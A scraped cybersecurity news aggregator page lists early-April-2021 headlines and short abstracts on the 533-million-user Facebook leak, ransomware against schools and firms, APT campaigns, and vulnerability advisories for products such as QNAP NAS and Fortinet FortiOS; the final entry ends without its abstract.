33.4% of ICS computers hit by a cyber attack in H2 2020 Full Text
Abstract
According to a report published by Kaspersky, the percentage of ICS computers hit by a cyber attack in the second half of 2020 on a global scale was 33.4%, (+0.85% than H1 2020).Security Affairs
April 06, 2021 – Hacker
Hackers From China Target Vietnamese Military and Government Full Text
Abstract
A hacking group related to a Chinese-speaking threat actor has been linked to an advanced cyberespionage campaign targeting government and military organizations in Vietnam. The attacks have been attributed with low confidence to the advanced persistent threat (APT) called Cycldek (or Goblin Panda, Hellsing, APT 27, and Conimes), which is known for using spear-phishing techniques to compromise diplomatic targets in Southeast Asia, India, and the U.S. at least since 2013. According to researchers from Kaspersky, the offensive, which was observed between June 2020 and January 2021, leverages a method called DLL side-loading to execute shellcode that decrypts a final payload dubbed " FoundCore ." DLL side-loading has been a tried-and-tested technique used by various threat actors as an obfuscation tactic to bypass antivirus defenses. By loading malicious DLLs into legitimate executables, the idea is to mask their malicious activity under a trusted system or software procThe Hacker News
April 6, 2021 – Vulnerabilities
Experts discovered a privilege escalation issue in popular Umbraco CMS Full Text
Abstract
Experts discovered a vulnerability in the popular CMS Umbraco that could allow low privileged users to escalate privileges to "admin." Security experts from Trustwave have discovered a privilege escalation vulnerability in the popular website CMS,...Security Affairs
April 6, 2021 – Vulnerabilities
Experts found critical flaws in Rockwell FactoryTalk AssetCentre Full Text
Abstract
Rockwell Automation has recently addressed nine critical vulnerabilities in its FactoryTalk AssetCentre product with the release of version v11. The American provider of industrial automation Rockwell Automation on Thursday informed customers that...Security Affairs
April 06, 2021 – Malware
Hackers Targeting professionals With ‘more_eggs’ Malware via LinkedIn Job Offers Full Text
Abstract
A new spear-phishing campaign is targeting professionals on LinkedIn with weaponized job offers in an attempt to infect targets with a sophisticated backdoor trojan called "more_eggs." To increase the odds of success, the phishing lures take advantage of malicious ZIP archive files that have the same name as that of the victims' job titles taken from their LinkedIn profiles. "For example, if the LinkedIn member's job is listed as Senior Account Executive—International Freight the malicious zip file would be titled Senior Account Executive—International Freight position (note the 'position' added to the end)," cybersecurity firm eSentire's Threat Response Unit (TRU) said in an analysis. "Upon opening the fake job offer, the victim unwittingly initiates the stealthy installation of the fileless backdoor, more_eggs." Campaigns delivering more_eggs using the same modus operandi have been spotted at least since 2018, with the backdoThe Hacker News
April 6, 2021 – Ransomware
Browser Locker Ransomware – A Fake Page that Threatens user and demands Ransom Full Text
Abstract
Browser lockers are also known as browlocks, are a class of online threats that prevent the victim from using the browser and...Cyber Security News
April 5, 2021 – Vulnerabilities
Probing restrictions may stilt Pentagon’s vulnerability disclosure program for contractors Full Text
Abstract
The push and pull between the military and security researchers is indicative of more widespread tensions that needs to be surmounted if the Pentagon wants to secure its contracting base.SCMagazine
April 05, 2021 – Breach
Adult content from hundreds of OnlyFans creators leaked online Full Text
Abstract
After a shared Google Drive was posted online containing the private videos and images from many OnlyFans accounts, a researcher has created a tool allowing content creators to check if they are part of the leak.BleepingComputer
April 05, 2021 – General
Hillicon Valley: Supreme Court sides with Google in copyright fight against Oracle | Justices dismiss suit over Trump’s blocking of critics on Twitter | Tim Cook hopes Parler will return to Apple Store Full Text
Abstract
The Supreme Court on Monday sided with Google against Oracle in a copyright fight, while vacating a previous ruling involving former President’s Trump use of Twitter. Meanwhile, Apple CEO Tim Cook said he hoped Parler would eventually return to the App Store, and a national labor board concluded that Amazon had illegally retaliated against two workers by firing them for speaking out against company policies.The Hill
April 5, 2021 – Encryption
Encryption debate could have enterprise security implications Full Text
Abstract
As the United Kingdom reignites the debate over data encryption, concern about trickle down impact to businesses emerge.SCMagazine
April 5, 2021 – Covid-19
Scholarship program to help aspiring NYC cyber pros hit financially by COVID Full Text
Abstract
SC Media presents a Q&A with Fullstack Academy’s NYC campus director and the NYC Economic Development Corporation’s assistant VP of emerging tech initiatives.SCMagazine
April 5, 2021 – Breach
533M Facebook Accounts Leaked Online: Check if You Are Exposed Full Text
Abstract
An estimated 32 million, of the half-billion of Facebook account details posted online, were tied to US-based accounts.Threatpost
April 5, 2021 – Hacker
Spy Operations Target Vietnam with Sophisticated RAT Full Text
Abstract
Researchers said the FoundCore malware represents a big step forward when it comes to evasion.Threatpost
April 05, 2021 – Solution
Microsoft Defender for Endpoint now supports Windows 10 Arm devices Full Text
Abstract
Microsoft today announced that Microsoft Defender for Endpoint, the enterprise version of its Defender antivirus, now comes with support for Windows 10 on Arm devices.BleepingComputer
April 5, 2021 – Phishing
LinkedIn Spear-Phishing Campaign Targets Job Hunters Full Text
Abstract
Fake job offers lure professionals into downloading the more_eggs backdoor trojan.Threatpost
April 5, 2021 – Criminals
Did Facebook’s business model make the company an easier target for cybercriminals? Full Text
Abstract
Some researchers argue that the situation showcases why Facebook must revisit how it handles and secures personal information.SCMagazine
April 5, 2021 – Vulnerabilities
Apple Mail Zero-Click Security Vulnerability Allows Email Snooping Full Text
Abstract
The researcher is offering details on CVE-2020-9922, which can be triggered just by sending a target an email with two .ZIP files attached.Threatpost
April 5, 2021 – Hacker
Once Again, North Korean Hackers Target Security Researchers Full Text
Abstract
According to Google's Threat Analysis Group (TAG), the attackers created a website for a fake company offering offensive security services to attract security researchers.Cyware Alerts - Hacker News
April 5, 2021 – Breach
Altdos Claims to Steal 300,000 Customers’ Data from Furniture Retailer Vhive Full Text
Abstract
In an e-mail to affected customers on Saturday, Altdos said it managed to hack into Vhive three times in nine days and claimed to have stolen information related to over 300,000 customers.Straits Times
April 5, 2021 – Criminals
Pastor Charged with Sharing CSAM Full Text
Abstract
Daytona Beach pastor allegedly shared child sexual abuse material in online chat roomsInfosecurity Magazine
April 5, 2021 – Phishing
Charming Kitten and Medical Researchers - A Cat and Mouse Game Full Text
Abstract
This late-2020 spearphishing campaign aimed to steal the credentials of 25 senior medical researchers in oncology, neurology, and genetic research in the U.S. and Israel.Cyware Alerts - Hacker News
April 5, 2021 – Breach
“Engineering Oversight” Costs ForceDAO $367k Full Text
Abstract
Exploitation by hackers of 183 ETH from newly launched DeFi aggregator was preventableInfosecurity Magazine
April 5, 2021 – APT
A41APT: An APT Campaign, a Multi-Layer Malware, and Japanese Targets Full Text
Abstract
The activity related to the campaign was first observed in November 2020 when reports of Japan-linked organizations being targeted in 17 regions across the world emerged.Cyware Alerts - Hacker News
April 5, 2021 – Breach
Data of Half a Billion Facebook Users Leaked Full Text
Abstract
Cyber-intelligence firm finds personal data of 533 million Facebook users posted onlineInfosecurity Magazine
April 5, 2021 – Hacker
Threat Actors Behind Hancitor Malware uses Network Ping Tool to Enumerate Active Directory (AD) Environment Full Text
Abstract
Hancitor is an information stealer and malware downloader used by a threat actor designated as MAN1, Moskalvzapoe, or TA511.Cyber Security News
April 5, 2021 – General
15 Cybersecurity Pitfalls and Fixes for SMBs Full Text
Abstract
In this roundtable, security experts focus on smaller businesses offer real-world advice for actionable ways to shore up defenses using fewer resources.Threatpost
April 5, 2021 – Attack
GitHub Infrastructure Used to Mine Cryptocurrency Full Text
Abstract
The threat actors seem to be targeting repositories that have GitHub Actions enabled in order to be able to add malicious Actions and fill Pull Requests aimed at executing malicious attacker code.Heimdal Security
April 5, 2021 – Breach
2,5M+ users can check whether their data were exposed in Facebook data leak Full Text
Abstract
You can check if your personal information is included in the Facebook data leak by querying the data breach notification service Have I Been Pwned. The news of the availability on a hacking forum of the personal information for 533,313,128 Facebook...Security Affairs
April 5, 2021 – Ransomware
Conti Ransomware Hits Broward County Public Schools with $40 Million Ransom Full Text
Abstract
Several weeks ago, the Conti ransomware gang targeted Broward County Public Schools and threatened to leak sensitive personal data of students and staff unless the district paid a $40 million ransom.Heimdal Security
April 05, 2021 – General
How the Work-From-Home Shift Impacts SaaS Security Full Text
Abstract
The data is in. According to IBM Security's 2020 Cost of a Data Breach Report , there is a 50% increase in cloud usage for enterprises across all industries. The number of threats targeting cloud services, predominantly collaboration services like Office 365, has increased 630% . Moreover, 75% of respondents report that discovery and recovery time from data breaches has significantly increased due to remote work during the pandemic. Although organizations can save over $1 million if they discover a breach in the first 30 days, the average reported response time was a whopping 280 days. In the remote-work world, SaaS apps have become an enticing vector-of-choice for bad actors. Just think of the typical employee, working off-site, untrained in security measures, and how their access or privileges increase the risk of sensitive data being stolen, exposed, or compromised. However, it doesn't have to be that way — a company's SaaS security posture can be strengthened, anThe Hacker News
April 5, 2021 – Breach
533 Million Facebook Users Personal Data Leaked that Includes Mark Zuckerberg’s Cell Phone Number – How to check that your Data Exposed? Full Text
Abstract
Facebook gets hacked to reveal its founder and CEO, Mark Zuckerberg’s cell phone number! However, Mark Zuckerberg’s details aren’t the only ones...Cyber Security News
April 5, 2021 – General
33.4% of ICS computers hit by a cyber attack in H2 2020 Full Text
Abstract
H2 2020 - Kaspersky observed an increase in ransomware attacks on industrial control system (ICS) systems in developed countries. Cybersecurity firm Kaspersky has published the Industrial Control System Threat Landscape report for H2 2020 which is based...Security Affairs
April 5, 2021 – General
How cloud architectures defend against the cyber attack surge Full Text
Abstract
If your applications are leveraging a distributed delivery model, for example leveraging cloud-based services such as content delivery networks (CDNs), then you have to worry less about DDoS attacks.Venture Beat
April 5, 2021 – Hacker
The leap of a Cycldek-related threat actor Full Text
Abstract
In the nebula of Chinese-speaking threat actors, it is quite common to see tools and methodologies being shared. One such example of this is the infamous DLL side-loading triad.Kaspersky Labs
April 5, 2021 – Malware
Malware Attack on Applus Impacts Vehicle Inspections in Multiple US States Full Text
Abstract
The company will spend some time to fully restore the operations and continue the vehicle inspections. According to the DMV, inspections will likely be suspended at least for another couple of days.Security Affairs
April 5, 2021 – Encryption
Encryption is either secure or it’s not – there is no middle ground Full Text
Abstract
The principle of end-to-end encryption underpins a system of communication where only the communicating users can read the messages, thereby preventing any eavesdropping.Help Net Security
April 5, 2021 – Ransomware
The “Fair” Upgrade Variant of Phobos Ransomware Full Text
Abstract
Researchers detected the execution of PowerShell scripts that were delivering the ransomware within memory without any executable on disk. It used paste.ee for delivering the loader and ransomware.Morphisec
April 5, 2021 – Phishing
Browser lockers: Extortion disguised as a fine Full Text
Abstract
It includes imitating the “blue screen of death” (BSOD) in the browser, false warnings about system errors or detected viruses, threats to encrypt files, legal liability notices, and many others.Kaspersky Labs
April 5, 2021 – Malware
Poulight Trojan: A “txt file” can steal all your secrets Full Text
Abstract
The Poulight Trojan has been put into use since last year and has complete and powerful functions to steal information. This attack proved that it has begun to spread and use overseas.360 Total Security
April 5, 2021 – Vulnerabilities
Firmware attacks, a grey area in cybersecurity of organizations Full Text
Abstract
A new report published by Microsoft revealed that 80% of global enterprises were victims of a firmware-focused cyberattack. Microsoft recently published a report that states, titled "March 2021 Security Signals report," that revealed that more than...Security Affairs
April 5, 2021 – Phishing
Criminals send out fake “census form” reminder – don’t fall for it! Full Text
Abstract
The server name used in the scam is obviously fake because it doesn’t end in .gov.uk, which is a controlled domain available only to official national, regional and local government bodies in the UK.Sophos
April 5, 2021 – Breach
533 million Facebook users’ phone numbers and personal data have been leaked online Full Text
Abstract
The exposed data includes personal information of over 533 million Facebook users from 106 countries, including over 32 million users in the US, 11 million in the UK, and 6 million in India.Business Insider
April 04, 2021 – Breach
How to check if your info was exposed in the Facebook data leak Full Text
Abstract
Data breach notification service Have I Been Pwned can now be used to check if your personal information was exposed in yesterday's Facebook data leak that contains the phone numbers and information for over 500 million users.BleepingComputer
April 04, 2021 – Ransomware
Sierra Wireless resumes production after ransomware attack Full Text
Abstract
Canadian IoT solutions provider Sierra Wireless announced that it resumed production at its manufacturing sites after it halted it due to a ransomware attack that hit its internal network and corporate website on March 20.BleepingComputer
April 4, 2021 – Malware
Beware – Hackers Using Call of Duty Cheats to Deliver Sophisticated Malware Full Text
Abstract
The video gaming industry is a popular target for various threat actors. Players, as well as studios and publishers themselves, are at...Cyber Security News
April 04, 2021 – Breach
533 Million Facebook Users’ Phone Numbers and Personal Data Leaked Online Full Text
Abstract
In what's likely to be a goldmine for bad actors, personal information associated with approximately 533 million Facebook users worldwide has been leaked on a popular cybercrime forum for free—which was harvested by hackers in 2019 using a Facebook vulnerability. The leaked data includes full names, Facebook IDs, mobile numbers, locations, email addresses, gender, occupation, city, country, marital status broken, account creation date, and other profile details down by country, with over 32 million records belonging to users in the U.S., 11 million users the U.K., and six million users in India, among others. In total, the data being offered includes user information from 106 countries. Additionally, the data seems to have been obtained by exploiting a vulnerability that enabled automated scripts to scrape Facebook users' public profiles and associated private phone numbers en masse. The flaw has since been fixed by Facebook. "This is old data that was previouslyThe Hacker News
April 4, 2021 – Malware
Malware attack on Applus blocked vehicle inspections in some US states Full Text
Abstract
A malware attack against vehicle inspection services provider Applus Technologies paralyzed preventing vehicle inspections in eight US states. Applus Technologies is a worldwide leader in the testing, inspection and certification sector, the company...Security Affairs
April 4, 2021 – General
Security Affairs newsletter Round 308 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to receive the complete weekly Security Affairs Newsletter for free, including the international...Security Affairs
April 4, 2021 – Ransomware
Clop Ransomware operators plunder US universities Full Text
Abstract
Clop ransomware gang leaked online data stolen from Stanford Medicine, University of Maryland Baltimore, and the University of California. Clop ransomware operators have leaked the personal and financial information stolen from Stanford Medicine,...Security Affairs
April 03, 2021 – Ransomware
University of California victim of ransomware attack Full Text
Abstract
The University of California (UC) said Wednesday that it was the victim of a ransomware attack.The Hill
April 03, 2021 – Malware
Malware attack is preventing car inspections in eight US states Full Text
Abstract
A malware cyberattack on emissions testing company Applus Technologies is preventing vehicle inspections in eight states, including Connecticut, Georgia, Idaho, Illinois, Massachusetts, Utah, and Wisconsin.BleepingComputer
April 03, 2021 – Breach
533 million Facebook users’ phone numbers leaked on hacker forum Full Text
Abstract
The mobile phone numbers and other personal information for approximately 533 million Facebook users worldwide has been leaked on a popular hacker forum for free.BleepingComputer
April 3, 2021 – Breach
Data of 533 million Facebook users leaked in a hacking forum for free Full Text
Abstract
On April 3, a user has leaked the phone numbers and personal data of 533 million Facebook users in a hacking forum for free online. Bad news for Facebook, a user in a hacking forum has published the phone numbers and personal data of 533 million Facebook...Security Affairs
April 3, 2021 – Breach
Capital One discovered more customers’ SSNs exposed in 2019 hack Full Text
Abstract
More clients of Capital One have been impacted in the 2019 data breach, the US bank is notifying them of their SSNs exposure. US bank Capital One notified a number of additional customers that their Social Security numbers were exposed in the data...Security Affairs
April 03, 2021 – Privacy
Most loved programming language Rust sparks privacy concerns Full Text
Abstract
Rust developers have repeatedly raised concerned about a privacy issue over the last few years. Rust has rapidly gained momentum among developers, for its focus on performance, safety, safe concurrency, and for having a similar syntax to C++. However, developers have been bothered by their Rust production binaries leaking usernames.BleepingComputer
April 3, 2021 – Attack
Attackers Found Abusing GitHub Infrastructure to Mine Cryptocurrency Full Text
Abstract
GitHub launched an investigation in a series of attacks aimed at abusing its infrastructure to illicitly mine cryptocurrency. Such kind of attacks were reported at least since the end of 2020.Security Affairs
April 03, 2021 – Attack
GitHub Actions being actively abused to mine cryptocurrency on GitHub servers Full Text
Abstract
GitHub Actions has been abused by attackers to mine cryptocurrency using GitHub's servers, automatically.The particular attack adds malicious GitHub Actions code to repositories forked from legitimate ones, and further creates a Pull Request for the original repository maintainers to merge the code back, to alter the original code.BleepingComputer
April 03, 2021 – Ransomware
Ransomware gang leaks data from Stanford, Maryland universities Full Text
Abstract
Stolen personal and financial information of students at Stanford Medicine, University of Maryland Baltimore (UMB), and the University of California was leaked online by the Clop ransomware group earlier this week.BleepingComputer
April 3, 2021 – Malware
Activision warns of Call of Duty Cheat tool used to deliver RAT Full Text
Abstract
The popular video game publisher Activision is warning gamers that threat actors are actively disguising a remote-access trojan (RAT) in Duty Cheat cheat tool. Activision, the company behind Call of Duty: Warzone and Guitar Hero series, is warning...Security Affairs
April 3, 2021 – Attack
Attackers are abusing GitHub infrastructure to mine cryptocurrency Full Text
Abstract
The popular code repository hosting service GitHub is investigating a crypto-mining campaign abusing its infrastructure. Code repository hosting service GitHub launched an investigation in a series of attacks aimed at abusing its infrastructure...Security Affairs
April 03, 2021 – Attack
Automated attack abuses GitHub Actions to mine cryptocurrency Full Text
Abstract
GitHub Actions has been abused by attackers to mine cryptocurrency using GitHub's servers, automatically.The particular attack adds malicious GitHub Actions code to repositories forked from legitimate ones, and further creates a Pull Request for the original repository maintainers to merge the code back, to alter the original code.BleepingComputer
April 3, 2021 – Ransomware
Evolution and rise of the Avaddon Ransomware-as-a-Service Full Text
Abstract
The Avaddon ransomware operators updated their malware after security researchers released a public decryptor in February 2021. The Avaddon ransomware family first appeared in the threat landscape in February 2020, and its authors started offering...Security Affairs
April 3, 2021 – Policy and Law
22-year-old Charged for Hacking into Public Watering Systems Full Text
Abstract
A 22-year-old man, Wyatt A. Travnichek from the U.S. state of Kansas has been accused on charges that he unauthorizedly accessed a...Cyber Security News
April 3, 2021 – Ransomware
As ransomware stalks the manufacturing sector, victims are still keeping quiet Full Text
Abstract
Two years later, Norsk Hydro’s transparency remains an outlier in a manufacturing sector that is increasingly dogged by ransomware attacks during the coronavirus pandemic.Cyberscoop
April 3, 2021 – Hacker
Hunting the hunters: How Russian hackers targeted US cyber first responders in SolarWinds breach Full Text
Abstract
After infiltrating US government computer networks early last year as part of the SolarWinds data breach, Russian hackers then turned their attention to the very people whose job was to track them down.CNN Money
April 3, 2021 – Government
Biden’s cyber executive order to include new rules for federal agencies, contractors Full Text
Abstract
Under a forthcoming White House order, companies that do business with the federal government would have to meet software security standards and swiftly report cyber incidents to a new entity within the DHS.Cyberscoop
April 3, 2021 – Vulnerabilities
QNAP caught napping as disclosure delay expires, critical NAS bugs revealed Full Text
Abstract
Some QNAP network-attached storage devices are vulnerable to attack because of two critical vulnerabilities, one that enables unauthenticated remote code execution and another that provides the ability to write to arbitrary files.The Register
April 3, 2021 – Ransomware
CNA shares details about ransomware attack, recovery effort Full Text
Abstract
The company, one of the biggest players in cybersecurity insurance specifically, had previously acknowledged an attack, but stopped short of specifying exactly what kind.Cyberscoop
April 3, 2021 – Ransomware
Inside the Ransomware Campaigns Targeting Exchange Servers Full Text
Abstract
As organizations around the world scrambled to patch critical Microsoft Exchange Server flaws patched last month, criminals upped the ante with multiple ransomware campaigns targeting vulnerable servers.Dark Reading
April 3, 2021 – Vulnerabilities
FBI & CISA Warn of Active Attacks on FortiOS Vulnerabilities Full Text
Abstract
The FBI and Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) today issued a joint advisory warning admins of active exploits targeting three vulnerabilities in Fortinet FortiOS.Dark Reading
April 02, 2021 – General
Hillicon Valley: Grid security funding not included in Biden’s infrastructure plan | Russia fines Twitter | Lawmakers call for increased school cybersecurity Full Text
Abstract
Experts this week were disappointed that President BidenJoe BidenThe Hill's Morning Report - Biden may find zero GOP support for jobs plan Republicans don't think Biden really wants to work with them Lack of cyber funds in Biden infrastructure plan raises eyebrows MORE’s $2.25 trillion infrastructure package did not include specific funding for securing the electric grid against cyberattacks, although the White House is working on a separate initiative to protect the grid. Meanwhile, a Russian court fined Twitter on Friday for failing to remove certain posts, and two Democratic lawmakers pressed the Education Department to protect K-12 institutions from malicious hackers.The Hill
April 2, 2021 – APT
FBI and CISA are warning of APT actors targeting Fortinet FortiOS servers Full Text
Abstract
FBI and CISA published a joint alert to warn of advanced persistent threat (APT) groups targeting Fortinet FortiOS to access networks of multiple organizations. The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security...Security Affairs
April 2, 2021 – Ransomware
Conti ransomware gang hits Broward County Schools with $40M demand Full Text
Abstract
Coral Glades High School, part of Broward County Public Schools. The $40 million ransomware attack on the district was one of a wave of cases targeting educational institutions over the last couple of weeks. (Formulanone, Public domain, via Wikimedia Commons) The Conti ransomware gang encrypted the systems at Broward County Public Schools several weeks ago and threatened to…SCMagazine
April 2, 2021 – General
Newly announced vehicle SOC will require unique set of skills, policies Full Text
Abstract
Challenges include avoiding false-positive alerts, understanding a complex blend of IT and OT, and establishing policies on attack response.SCMagazine
April 2, 2021 – Breach
Qualys: Breach limited to 3rd-party vendor, but attackers trying to make exposure seem worse Full Text
Abstract
In a detailed update posted on the Qualys website April 2, CISO Ben Carr said that an independent, third-party forensic firm has verified the company’s initial determination that the attack did not jump from Accellion’s file transfer appliance server to Qualys’ larger corporate network.SCMagazine
April 02, 2021 – Outage
Brown University hit by cyberattack, some systems still offline Full Text
Abstract
Brown University, a private US research university, had to disable systems and cut connections to the data center after suffering a cyberattack on Tuesday.BleepingComputer
April 2, 2021 – Accident
FBI: APTs Actively Exploiting Fortinet VPN Security Holes Full Text
Abstract
Three security vulnerabilities in the Fortinet SSL VPN are being used to gain a foothold within networks before moving laterally and carrying out recon.Threatpost
April 02, 2021 – Breach
GitHub Arctic Vault likely contains leaked MedData patient records Full Text
Abstract
GitHub Arctic Code Vault has likely inadvertently captured sensitive patient medical records from multiple healthcare facilities. The private data was leaked on GitHub repositories last year that are now part of a collection of open-source contributions bound to last a 1,000 years.BleepingComputer
April 2, 2021 – Vulnerabilities
TIM’s Red Team Research (RTR) team found 5 zero-day flaws in the CA eHealth Performance Manager product Full Text
Abstract
Researchers from TIM’s Red Team Research discovered five new vulnerabilities affecting the CA eHealth Performance Manager product. Researchers from TIM’s Red Team Research led by Massimiliano Brolli, discovered 5 new vulnerabilities affecting...Security Affairs
April 2, 2021 – APT
APTs targeting Fortinet, CISA and FBI warn Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) and FBI issued a joint advisory Friday that advanced persistant threat groups are scanning for vulnerable Fortinet products. “It is likely that the APT actors are scanning for these vulnerabilities to gain access to multiple government, commercial, and technology services networks,” reads the advisory. The APTs, which CISA…SCMagazine
April 02, 2021 – Ransomware
Asteelflash electronics maker hit by REvil ransomware attack Full Text
Abstract
Asteelflash, a leading French electronics manufacturing services company, has suffered a cyberattack by the REvil ransomware gang who is demanding a $24 million ransom.BleepingComputer
April 2, 2021 – Malware
Call of Duty Cheats Expose Gamers to Malware, Takeover Full Text
Abstract
Activision is warning that cyberattackers are disguising malware — a remote-access trojan (RAT) — in cheat programs.Threatpost
April 2, 2021 – Vulnerabilities
Tens of thousands of QNAP SOHO NAS devices affected by unpatched RCEs Full Text
Abstract
Unpatched vulnerabilities in QNAP small office/home office (SOHO) network-attached storage (NAS) devices could be exploited by remote attackers to remotely execute arbitrary code. Security researchers at SAM Seamless Network discovered a couple of critical...Security Affairs
April 02, 2021 – Hacker
FBI and CISA warn of state hackers attacking Fortinet FortiOS servers Full Text
Abstract
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) warn of advanced persistent threat (APT) actors targeting Fortinet FortiOS servers using multiple exploits.BleepingComputer
April 02, 2021 – General
Popular Twitch AdBlock shuts down after Twitch breaks extension Full Text
Abstract
The popular Twitch AdBlock extension has been removed from both Chrome Web Store and Firefox Addons. Twitch AdBlock was the choice of extension among Twitch users for restricting ads when using Twitch. The extension's author stated before its removal, the ad blocker had over 150,000 users and 6 million daily views.BleepingComputer
April 2, 2021 – Malware
From PowerShell to Payload: An Analysis of Weaponized Malware Full Text
Abstract
John Hammond, security researcher with Huntress, takes a deep-dive into a malware’s technical and coding aspects.Threatpost
April 02, 2021 – Breach
Qualys says Accellion hackers did not breach production systems Full Text
Abstract
Cybersecurity firm Qualys said today that the attackers who breached its Accellion FTA server didn't infiltrate the company's production and corporate environments.BleepingComputer
April 2, 2021 – Policy and Law
Intelligence Analyst Fed Secrets to Reporter Full Text
Abstract
Former intelligence analyst pleads guilty to disclosing classified information to journalistInfosecurity Magazine
April 02, 2021 – Breach
Capital One notifies more clients of SSNs exposed in 2019 data breach Full Text
Abstract
US bank Capital One notified additional customers that their Social Security numbers were exposed in a data breach announced in July 2019.BleepingComputer
April 2, 2021 – General
What Is a Cybersecurity Legal Practice? Full Text
Abstract
Some considerations for companies looking to build out a cybersecurity legal practice.Lawfare
April 2, 2021 – Policy and Law
Troll Fined $81 After Victim Kills Herself Full Text
Abstract
Cyber-bully who asked wrestler “when will you die?” fined after victim takes her own lifeInfosecurity Magazine
April 2, 2021 – Government
Canada’s Defense Strategy Falls Behind in the Quantum Age Full Text
Abstract
Spurred on by recent quantum computing milestones, a global “quantum race” is underway—but Canada is still without a strategy.Lawfare
April 2, 2021 – Outage
Microsoft Suffers Second Outage in Two Weeks Full Text
Abstract
April Fool’s Day cloud outage impacts Azure, Office 365, and TeamsInfosecurity Magazine
April 2, 2021 – Vulnerabilities
Critical QNAP Vulnerabilities Let Attackers Access User Data and Complete Takeover Full Text
Abstract
SAM’s security research team revealed two recent vulnerabilities and their potential impacts that are discovered in a specific kind of NAS device...Cyber Security News
April 2, 2021 – Ransomware
Conti Ransomware gang demanded $40 million ransom to Broward County Public Schools Full Text
Abstract
Ransomware gang demanded a $40,000,000 ransom to the Broward County Public Schools district, Florida. It is just the last attack of a long string against the sector. Ransomware operators continue to target organizations worldwide and school districts...Security Affairs
April 2, 2021 – Vulnerabilities
Airlift Express Fixes Vulnerabilities in Its E-commerce Store Full Text
Abstract
A team of security researchers from PrivacySavvy recently discovered an OTP vulnerability in Airlift Express, which could lead to account hacks and exploits by cybercriminals.Security Affairs
April 2, 2021 – Phishing
Non-Fungible Tokens: Of Course They’re Attracting Scammers Full Text
Abstract
Since digital ownership of Twitter CEO Jack Dorsey's first tweet sold for $2.9 million, security researchers now expect fraudsters to focus more on non-fungible token aficionados.Gov Info Security
April 02, 2021 – General
Lawmakers urge Education Department to take action to defend schools from cyber threats Full Text
Abstract
Reps. Doris Matsui (D-Calif.) and Jim LangevinJames (Jim) R. LangevinLawmakers roll out bill to protect critical infrastructure after Florida water hack Hillicon Valley: House approves almost billion in cyber, tech funds as part of relief package | Officials warn of 'widespread' exploit of Microsoft vulnerabilities | Facebook files to dismiss antitrust lawsuits New research finds 'record-breaking' number of K-12 cyber incidents in 2020 MORE (D-R.I.) on Friday urged the Department of Education to prioritize protecting K-12 institutions from cyberattacks, which have shot up in the past year as classes moved increasingly online during the COVID-19 pandemic.The Hill
April 2, 2021 – Phishing
Robinhood Warns Customers of Tax-Season Phishing Scams Full Text
Abstract
Attackers are impersonating the stock-trading broker using fake websites to steal credentials as well as sending emails with malicious tax files.Threatpost
April 2, 2021 – Breach
Leaker Dismisses MobiKwik’s Not-So-Nimble Breach Denial Full Text
Abstract
A broker of breached data claims via dedicated .onion leak site to have deleted 8TB of stolen MobiKwik customer data that the company denies was stolen. The listing for 8.2TB of stolen data was withdrawn by a cybercrime forum seller.Gov Info Security
April 2, 2021 – Vulnerabilities
Airlift Express Fixes Vulnerabilities in Its E-commerce Store Full Text
Abstract
PrivacySavvy experts discovered an OTP vulnerability in Airlift Express, which could lead to account hacks and exploits by cybercriminals. A team of security researchers from PrivacySavvy recently discovered an OTP vulnerability in Airlift Express,...Security Affairs
April 02, 2021 – Breach
GitHub Arctic Vault likely has leaked MedData patient records Full Text
Abstract
GitHub Arctic Code Vault has likely inadvertently captured sensitive patient medical records from multiple healthcare facilities. The private data was leaked on GitHub repositories last year that are now part of a collection of open-source contributions bound to last a 1,000 years.BleepingComputer
April 2, 2021 – Ransomware
Ransomware Declared As a National Security Threat by DHS Full Text
Abstract
In an RSA conference webcast, Alejandro Mayorkas, the U.S. Secretary of Homeland Security, stated that fighting ransomware attacks is now the Department of Homeland Security's number one priority, and a plan to be more proactive is already in place.Tech Target
April 02, 2021 – Ransomware
Ransomware gang wanted $40 million in Florida schools cyberattack Full Text
Abstract
Fueled by large payments from victims, ransomware gangs have started to demand ridiculous ransoms from organizations that can not afford them. An example of this is a recently revealed ransomware attack on the Broward County Public Schools district where threat actors demanded a $40,000,000 payment.BleepingComputer
April 2, 2021 – Denial Of Service
DDoS Attacks Peaked at 800Gbps Targets Gambling and Video Games Industry Full Text
Abstract
According to security services provider Akamai, Distributed Denial of Service (DDoS) attacks are growing bigger in volume, and they have also become...Cyber Security News
April 2, 2021 – Vulnerabilities
Trustwave Uncovers Vulnerability in Popular Website CMS Full Text
Abstract
Privilege escalation issue found on website CMS UmbracoInfosecurity Magazine
April 2, 2021 – Government
DHS CISA requires federal agencies to assess their Microsoft Exchange servers by April 5 Full Text
Abstract
The DHS CISA has issued a supplemental directive that requires all federal agencies to identify vulnerable Microsoft Exchange servers in their infrastructure within five days. The Department of Homeland Security’s Cybersecurity and Infrastructure...Security Affairs
April 02, 2021 – Government
Lack of cyber funds in Biden infrastructure plan raises eyebrows Full Text
Abstract
President Biden's $2.25 trillion infrastructure plan does not include any funds to protect critical infrastructure against cyberattacks, even as the threat grows against targets like the electric grid.The Hill
April 2, 2021 – Malware
Android “System Update” malware steals photos, videos, GPS location Full Text
Abstract
A newly discovered piece of Android malware shares the same capabilities found within many modern stalkerware-type apps—it can swipe images and video, rifle through online searches, record phone calls, and video, and peer into GPS location data.Malwarebytes Labs
April 2, 2021 – Criminals
Cybercriminal hacks vaccine marketplace, makes over $752K Full Text
Abstract
In a bizarre incident, a hacker has taken down a vaccine marketplace being run on the Dark Web, created fake orders, canceled them, and took a refund in Bitcoins worth $752,000.The Times Of India
April 2, 2021 – Government
NIST Publishes Guide for Securing Hotel Property Management Systems Full Text
Abstract
The National Institute of Standards and Technology (NIST) has released a cybersecurity guide for the hospitality industry to help reduce security risks related to hotel property-management system software.Dark Reading
April 2, 2021 – Policy and Law
Dutch watchdog fines Booking.com $560k after it kept customer data thefts quiet for more than 3 weeks Full Text
Abstract
The Netherlands Data Protection Authority has fined Booking.com $560,000 for notifying it too late that criminals had accessed the data of 4,109 people who booked a hotel room via the website.The Register
April 2, 2021 – Breach
Ubiquiti Shares Dive After Reportedly Downplaying ‘Catastrophic’ Data Breach Full Text
Abstract
